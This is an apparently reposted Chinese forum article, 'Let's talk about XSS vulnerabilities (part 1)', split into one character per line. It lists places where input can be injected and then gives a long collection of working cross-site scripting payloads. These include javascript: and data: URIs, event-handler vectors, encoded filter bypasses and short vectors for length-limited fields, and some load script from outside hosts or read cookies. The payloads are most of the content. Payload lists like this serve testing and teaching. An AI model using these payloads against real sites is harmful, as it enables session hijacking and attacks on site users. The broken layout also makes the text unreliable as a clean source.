论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[18779] 2019-05-29_聊聊XSS漏洞(一)
文档创建者:
s7ckTeam
浏览次数:
16
最后更新:
2025-01-18
漏洞
16 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2019-05-29_聊聊XSS漏洞(一)
聊
聊
X
S
S
漏
洞
(
一
)
c
r
h
u
a
h
u
a
s
e
c
2
0
1
9
-
0
5
-
2
9
“
关
于
X
S
S
的
一
些
总
结
,
明
天
更
b
y
p
a
s
s
。
”
0
1
—
利
用
点
一
句
话
一
切
可
控
的
输
入
、
输
出
。
0
2
—
p
a
y
l
o
a
d
介
绍
(
1
)
a
标
签
标
签
当
点
击
a
标
签
触
发
-
G
E
T
/
P
O
S
T
以
及
h
e
a
d
e
r
中
可
控
参
数
-
W
i
f
i
热
点
/
设
备
编
号
构
造
p
a
y
l
o
a
d
(
有
些
站
点
会
记
录
历
史
登
录
的
设
备
等
你
这
方
面
信
息
传
到
服
务
器
)
-
电
话
本
、
短
信
(
有
的
a
p
p
会
获
取
你
电
话
本
,
通
话
记
录
等
信
息
,
反
日
)
-
多
平
台
验
证
构
造
的
p
a
y
l
o
a
d
(
一
般
开
发
进
度
不
一
致
,
导
致
可
能
苹
果
端
的
修
复
了
,
安
卓
的
还
没
有
)
-
用
户
注
册
信
息
、
用
户
名
处
-
构
造
好
的
p
a
y
l
o
a
d
存
放
在
二
维
码
、
或
者
隐
性
的
让
用
户
触
发
(
比
如
写
一
个
类
似
a
n
t
i
g
r
a
v
i
t
y
模
块
)
-
直
播
评
论
位
置
-
在
线
客
服
交
流
-
分
享
到
第
三
方
平
台
-
富
文
本
相
关
的
编
辑
器
-
企
业
自
己
搭
建
的
邮
箱
-
站
内
消
息
/
私
信
-
各
类
搜
索
-
浏
览
器
插
件
-
发
红
包
x
s
s
-
记
事
本
、
W
o
r
d
、
P
D
F
等
一
些
在
线
预
览
功
能
-
F
l
a
s
h
-
搜
索
框
-
搜
索
过
后
的
历
史
记
录
-
A
P
I
接
口
-
上
传
功
能
点
相
关
位
置
-
报
销
发
票
处
-
移
动
a
p
p
用
户
反
馈
-
M
H
T
M
L
协
议
-
站
点
的
手
机
w
e
b
端
(
一
般
w
a
f
薄
弱
)
-
A
T
M
机
-
论
坛
等
伪
协
议
-
回
复
短
信
触
发
接
受
平
台
-
在
线
音
乐
添
加
歌
词
、
修
改
上
传
本
地
音
乐
等
属
性
-
图
片
上
传
、
属
性
等
可
控
参
数
-
截
图
上
传
-
页
面
读
取
系
统
时
间
-
O
C
R
识
别
后
触
发
x
s
s
-
微
信
公
众
号
-
购
物
下
单
-
百
度
快
照
-
举
报
页
面
-
自
动
应
答
机
器
人
、
与
智
能
设
备
对
话
输
出
-
收
藏
夹
-
W
h
o
i
s
信
息
x
s
s
-
语
音
翻
译
-
K
T
V
点
歌
-
导
出
p
d
f
文
件
<
a
h
r
e
f
=
"
j
a
v
a
s
c
r
i
p
t
:
c
o
n
f
i
r
m
(
'
a
'
)
"
>
1
<
/
a
>
<
a
h
r
e
f
=
"
d
a
t
a
:
t
e
x
t
/
h
t
m
l
;
b
a
s
e
6
4
,
P
G
l
t
Z
y
B
z
c
m
M
9
e
C
B
v
b
m
V
y
c
m
9
y
P
W
F
s
Z
X
J
0
K
D
E
p
P
g
=
=
"
>
t
e
s
t
<
/
a
>
e
v
a
l
a
t
o
b
:
<
a
h
r
e
f
=
j
a
v
a
s
c
r
i
p
t
:
e
v
a
l
(
a
t
o
b
(
'
Y
W
x
l
c
n
Q
o
M
S
k
=
'
)
)
>
c
l
i
c
k
<
/
a
>
/
/
需
要
引
入
单
引
号
或
双
引
号
(
2
)
s
r
c
属
性
属
性
(
3
)
i
f
r
a
m
e
标
签
标
签
(
4
)
e
m
b
e
d
标
签
标
签
(
5
)
a
c
t
i
o
n
属
性
属
性
利
用
<
f
o
r
m
,
<
i
s
i
n
d
e
x
等
标
签
中
的
a
c
t
i
o
n
属
性
执
行
j
a
v
a
s
c
r
i
p
t
(
6
)
f
o
r
m
a
c
t
i
o
n
属
性
属
性
(
7
)
b
a
c
k
g
r
o
u
n
d
属
性
属
性
s
t
r
i
n
g
.
f
r
o
m
C
h
a
r
C
o
d
e
:
<
a
h
r
e
f
=
'
j
a
v
a
s
c
r
i
p
t
:
e
v
a
l
(
S
t
r
i
n
g
.
f
r
o
m
C
h
a
r
C
o
d
e
(
9
7
,
1
0
8
,
1
0
1
,
1
1
4
,
1
1
6
,
4
0
,
4
9
,
4
1
)
)
'
>
c
l
i
c
k
<
/
a
>
I
E
下
生
效
<
a
h
r
e
f
=
"
v
b
s
c
r
i
p
t
:
a
l
e
r
t
(
2
)
"
>
c
l
i
c
k
m
e
<
/
a
>
j
a
v
a
s
c
r
i
p
t
:
和
v
b
s
c
r
i
p
t
:
协
议
执
行
后
的
结
果
将
会
映
射
在
D
O
M
后
面
。
<
a
h
r
e
f
=
"
j
a
v
a
s
c
r
i
p
t
:
'
x
3
c
i
m
g
s
r
c
x
3
d
x
o
n
e
r
r
o
r
=
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
)
>
'
"
>
c
l
i
c
k
m
e
<
/
a
>
<
i
m
g
s
r
c
=
x
o
n
e
r
r
o
r
=
p
r
o
m
p
t
(
1
)
;
>
<
i
m
g
/
s
r
c
=
a
a
a
.
j
p
g
o
n
e
r
r
o
r
=
p
r
o
m
p
t
(
1
)
;
>
<
v
i
d
e
o
s
r
c
=
x
o
n
e
r
r
o
r
=
p
r
o
m
p
t
(
1
)
;
>
<
a
u
d
i
o
s
r
c
=
x
o
n
e
r
r
o
r
=
p
r
o
m
p
t
(
1
)
;
>
<
i
m
g
/
o
n
e
r
r
o
r
=
a
l
e
r
t
(
1
)
s
r
c
=
a
>
<
i
m
g
[
%
0
9
]
o
n
e
r
r
o
r
=
a
l
e
r
t
(
1
)
s
r
c
=
a
>
<
i
m
g
[
%
0
d
]
o
n
e
r
r
o
r
=
a
l
e
r
t
(
1
)
s
r
c
=
a
>
%
2
5
3
c
i
m
g
%
2
0
o
n
e
r
r
o
r
=
a
l
e
r
t
(
1
)
%
2
0
s
r
c
=
a
%
2
5
3
e
?
i
m
g
o
n
e
r
r
o
r
=
a
l
e
r
t
(
1
)
s
r
c
=
a
?
<
i
f
r
a
m
e
s
r
c
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
2
)
"
>
<
i
f
r
a
m
e
/
s
r
c
=
"
d
a
t
a
:
t
e
x
t
&
s
o
l
;
h
t
m
l
;
&
T
a
b
;
b
a
s
e
6
4
&
N
e
w
L
i
n
e
;
,
P
G
J
v
Z
H
k
g
b
2
5
s
b
2
F
k
P
W
F
s
Z
X
J
0
K
D
E
p
P
g
=
=
"
>
<
i
f
r
a
m
e
s
r
c
=
"
%
0
A
j
%
0
A
a
%
0
A
v
%
0
A
a
%
0
A
s
%
0
A
c
%
0
A
r
%
0
A
i
%
0
A
p
%
0
A
t
%
0
A
%
3
A
a
l
e
r
t
(
0
)
"
>
内
容
可
以
实
体
编
码
,
不
影
响
X
S
S
执
行
<
i
f
r
a
m
e
s
r
c
=
"
d
a
t
a
:
t
e
x
t
/
h
t
m
l
;
"
&
l
t
;
s
c
r
i
p
t
&
g
t
;
a
l
e
r
t
&
#
4
0
;
1
&
#
4
1
;
&
l
t
;
/
s
c
r
i
p
t
&
g
t
;
"
>
<
i
f
r
a
m
e
s
r
c
=
"
j
a
v
a
s
c
r
i
p
t
%
0
a
%
d
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)
;
"
>
<
i
f
r
a
m
e
s
r
c
=
"
d
a
t
a
:
μ
,
<
s
c
r
i
p
t
>
a
l
e
r
t
(
1
)
<
/
s
c
r
i
p
t
>
"
>
<
/
i
f
r
a
m
e
>
<
i
f
r
a
m
e
s
r
c
=
"
d
a
t
a
:
&
#
f
f
f
f
;
,
<
s
c
r
i
p
t
>
a
l
e
r
t
(
2
)
<
/
s
c
r
i
p
t
>
"
>
<
/
i
f
r
a
m
e
>
<
e
m
b
e
d
/
s
r
c
=
/
/
g
o
o
.
g
l
/
n
l
X
0
P
>
<
f
o
r
m
a
c
t
i
o
n
=
"
J
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)
"
>
<
i
n
p
u
t
t
y
p
e
=
s
u
b
m
i
t
>
<
i
s
i
n
d
e
x
a
c
t
i
o
n
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)
"
t
y
p
e
=
i
m
a
g
e
>
<
i
s
i
n
d
e
x
a
c
t
i
o
n
=
j
&
T
a
b
;
a
&
T
a
b
;
v
a
s
&
T
a
b
;
c
&
T
a
b
;
r
&
T
a
b
;
i
p
t
:
a
l
e
r
t
(
1
)
t
y
p
e
=
i
m
a
g
e
>
<
i
s
i
n
d
e
x
a
c
t
i
o
n
=
d
a
t
a
:
t
e
x
t
/
h
t
m
l
,
t
y
p
e
=
i
m
a
g
e
>
<
f
o
r
m
a
c
t
i
o
n
=
'
d
a
t
a
:
t
e
x
t
&
s
o
l
;
h
t
m
l
,
&
l
t
;
s
c
r
i
p
t
&
g
t
;
a
l
e
r
t
(
1
)
&
l
t
/
s
c
r
i
p
t
&
g
t
'
>
<
b
u
t
t
o
n
>
C
L
I
C
K
<
i
s
i
n
d
e
x
f
o
r
m
a
c
t
i
o
n
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)
"
t
y
p
e
=
i
m
a
g
e
>
<
i
n
p
u
t
t
y
p
e
=
"
i
m
a
g
e
"
f
o
r
m
a
c
t
i
o
n
=
J
a
V
a
S
c
r
i
p
t
:
a
l
e
r
t
(
0
)
>
<
f
o
r
m
>
<
b
u
t
t
o
n
f
o
r
m
a
c
t
i
o
n
=
j
a
v
a
s
c
r
i
p
t
&
c
o
l
o
n
;
a
l
e
r
t
(
1
)
>
C
L
I
C
K
M
E
<
i
n
p
u
t
t
y
p
e
=
"
t
e
x
t
"
o
n
c
h
a
n
g
e
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
f
o
r
m
_
a
c
t
i
o
n
4
'
)
"
>
表
单
标
签
中
,
前
三
个
都
要
点
击
事
件
触
发
,
最
后
一
个
得
到
改
变
内
容
的
时
候
触
发
/
/
在
O
p
e
r
a
1
0
.
5
和
I
E
6
上
有
效
<
t
a
b
l
e
b
a
c
k
g
r
o
u
n
d
=
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)
>
<
/
t
a
b
l
e
>
(
8
)
p
o
s
t
e
r
属
性
属
性
(
9
)
d
a
t
a
属
性
属
性
(
1
0
)
c
o
d
e
属
性
属
性
(
1
1
)
事
件
触
发
事
件
触
发
(
1
2
)
最
短
测
试
向
量
最
短
测
试
向
量
(
1
3
)
嵌
套
嵌
套
(
1
4
)
l
o
c
a
t
i
o
n
属
性
属
性
(
1
5
)
e
x
p
r
e
s
s
i
o
n
属
性
属
性
(
1
6
)
s
v
g
使
用
使
用
上
面
这
段
代
码
插
入
至
少
可
以
输
入
4
6
个
字
符
的
地
方
,
然
后
访
问
/
/
O
p
e
r
a
1
0
.
5
以
下
有
效
<
v
i
d
e
o
p
o
s
t
e
r
=
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)
/
/
>
<
/
v
i
d
e
o
>
<
o
b
j
e
c
t
d
a
t
a
=
"
d
a
t
a
:
t
e
x
t
/
h
t
m
l
;
b
a
s
e
6
4
,
P
H
N
j
c
m
l
w
d
D
5
h
b
G
V
y
d
C
g
i
S
G
V
s
b
G
8
i
K
T
s
8
L
3
N
j
c
m
l
w
d
D
4
=
"
>
<
a
p
p
l
e
t
c
o
d
e
=
"
j
a
v
a
s
c
r
i
p
t
:
c
o
n
f
i
r
m
(
d
o
c
u
m
e
n
t
.
c
o
o
k
i
e
)
;
"
>
/
/
F
i
r
e
f
o
x
有
效
<
e
m
b
e
d
c
o
d
e
=
"
h
t
t
p
:
/
/
b
u
s
i
n
e
s
s
i
n
f
o
.
c
o
.
u
k
/
l
a
b
s
/
x
s
s
/
x
s
s
.
s
w
f
"
a
l
l
o
w
s
c
r
i
p
t
a
c
c
e
s
s
=
a
l
w
a
y
s
>
<
s
v
g
/
o
n
l
o
a
d
=
p
r
o
m
p
t
(
1
)
;
>
<
m
a
r
q
u
e
e
/
o
n
s
t
a
r
t
=
c
o
n
f
i
r
m
(
2
)
>
/
<
b
o
d
y
o
n
l
o
a
d
=
p
r
o
m
p
t
(
1
)
;
>
<
s
e
l
e
c
t
a
u
t
o
f
o
c
u
s
o
n
f
o
c
u
s
=
a
l
e
r
t
(
1
)
>
<
t
e
x
t
a
r
e
a
a
u
t
o
f
o
c
u
s
o
n
f
o
c
u
s
=
a
l
e
r
t
(
1
)
>
<
k
e
y
g
e
n
a
u
t
o
f
o
c
u
s
o
n
f
o
c
u
s
=
a
l
e
r
t
(
1
)
>
<
v
i
d
e
o
>
<
s
o
u
r
c
e
o
n
e
r
r
o
r
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)
"
>
<
m
a
r
q
u
e
e
o
n
s
t
a
r
t
=
"
c
o
n
f
i
r
m
(
)
"
>
h
k
<
/
m
a
r
q
u
e
e
>
<
m
a
r
q
u
e
e
b
e
h
a
v
i
o
r
=
"
a
l
t
e
r
n
a
t
e
"
o
n
s
t
a
r
t
=
p
r
o
m
p
t
(
)
>
h
k
<
/
m
a
r
q
u
e
e
>
<
m
a
r
q
u
e
e
l
o
o
p
=
"
1
"
o
n
f
i
n
i
s
h
=
p
r
o
m
p
t
(
)
>
h
k
<
/
m
a
r
q
u
e
e
>
<
b
o
d
y
o
n
p
a
g
e
s
h
o
w
=
p
r
o
m
p
t
(
)
>
<
s
t
y
l
e
o
n
l
o
a
d
=
p
r
o
m
p
t
(
)
>
<
l
i
n
k
h
r
e
f
=
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)
a
c
c
e
s
s
k
e
y
=
k
>
<
!
-
-
-
-
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
0
)
;
<
/
s
c
r
i
p
t
>
<
!
<
s
c
r
i
p
t
>
a
l
e
r
t
(
1
)
<
/
s
c
r
i
p
t
>
<
<
s
c
r
i
p
t
>
a
l
e
r
t
(
1
)
;
/
/
<
<
/
s
c
r
i
p
t
>
<
+
!
-
<
s
c
r
i
p
t
/
s
r
c
+
=
+
/
/
h
t
t
p
:
/
/
1
4
.
r
s
/
/
+
>
<
/
s
c
r
i
p
t
/
s
r
c
>
-
>
<
q
/
o
n
c
u
t
=
o
p
e
n
(
)
>
<
q
/
o
n
c
u
t
=
a
l
e
r
t
(
1
)
>
/
/
在
限
制
长
度
的
地
方
很
有
效
3
7
个
字
之
内
不
能
引
用
,
不
存
在
<
s
c
r
i
p
t
>
不
能
有
/
<
s
v
g
o
n
l
o
a
d
=
e
v
a
l
(
a
t
o
b
(
p
)
)
>
<
s
v
g
o
n
l
o
a
d
=
p
+
=
'
Y
W
x
l
c
n
Q
o
M
S
k
7
'
>
<
s
v
g
o
n
l
o
a
d
=
p
=
'
Y
W
x
l
c
n
Q
o
M
i
k
7
'
>
<
m
a
r
q
u
e
e
<
m
a
r
q
u
e
e
/
o
n
s
t
a
r
t
=
c
o
n
f
i
r
m
(
2
)
>
/
o
n
s
t
a
r
t
=
c
o
n
f
i
r
m
(
1
)
>
/
/
I
E
8
有
效
<
c
o
m
m
a
n
d
o
n
m
o
u
s
e
o
v
e
r
=
"
x
6
A
x
6
1
x
7
6
x
6
1
x
5
3
x
4
3
x
5
2
x
4
9
x
5
0
x
5
4
x
2
6
x
6
3
x
6
F
x
6
C
x
6
F
x
6
E
x
3
B
x
6
3
x
6
F
x
6
E
x
6
6
x
6
9
x
7
2
x
6
D
x
2
6
x
6
C
x
7
0
x
6
1
x
7
2
x
3
B
x
3
1
x
2
6
x
7
2
x
7
0
x
6
1
x
7
2
x
3
B
"
>
S
a
v
e
<
/
c
o
m
m
a
n
d
>
<
a
o
n
m
o
u
s
e
o
v
e
r
=
l
o
c
a
t
i
o
n
=
'
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)
'
>
c
l
i
c
k
<
b
o
d
y
o
n
f
o
c
u
s
=
"
l
o
a
c
t
i
o
n
=
'
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)
'
"
>
1
2
3
/
/
I
E
7
以
下
<
i
m
g
s
t
y
l
e
=
"
x
s
s
:
e
x
p
r
e
s
s
i
o
n
(
a
l
e
r
t
(
0
)
)
"
>
/
/
I
E
7
以
下
<
d
i
v
s
t
y
l
e
=
"
c
o
l
o
r
:
r
g
b
(
'
'
&
#
0
;
x
:
e
x
p
r
e
s
s
i
o
n
(
a
l
e
r
t
(
1
)
)
"
>
<
/
d
i
v
>
/
/
I
E
7
以
下
<
s
t
y
l
e
>
#
t
e
s
t
{
x
:
e
x
p
r
e
s
s
i
o
n
(
a
l
e
r
t
(
/
X
S
S
/
)
)
}
<
/
s
t
y
l
e
>
<
s
v
g
/
o
n
l
o
a
d
=
e
v
a
l
(
l
o
c
a
t
i
o
n
.
h
a
s
h
.
s
p
l
i
t
(
'
#
'
)
[
1
]
)
>
0
3
—
h
t
m
l
自
解
码
机
制
0
x
0
1
H
T
M
L
形
式
的
编
码
形
式
的
编
码
&
#
x
H
;
(
十
六
进
制
格
式
)
、
&
#
D
;
(
十
进
制
形
式
)
、
最
后
的
分
号
(
;
)
可
以
不
要
0
x
0
2
自
解
码
机
制
自
解
码
机
制
当
用
户
的
输
入
出
现
在
H
T
M
L
标
签
内
,
j
s
执
行
之
前
会
进
行
自
解
码
例
如
这
段
代
码
在
执
行
的
过
程
中
,
会
将
h
t
m
l
实
体
编
码
自
解
码
为
之
前
的
符
号
,
因
此
这
段
代
码
会
执
行
a
l
e
r
t
(
1
)
的
弹
窗
。
0
4
—
总
结
未
完
待
续
。
。
。
h
t
t
p
:
/
/
e
x
a
m
p
l
e
.
c
o
m
/
#
a
l
e
r
t
(
)
;
<
i
n
p
u
t
t
y
p
e
=
"
b
u
t
t
o
n
"
i
d
=
"
b
t
n
"
v
a
l
u
e
=
"
e
x
e
c
"
o
n
c
l
i
c
k
=
"
d
o
c
u
m
e
n
t
.
w
r
i
t
e
(
'
&
l
t
;
s
c
r
i
p
t
&
g
t
;
a
l
e
r
t
(
1
)
&
l
t
;
/
s
c
r
i
p
t
&
g
t
;
'
)
"
/
>
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞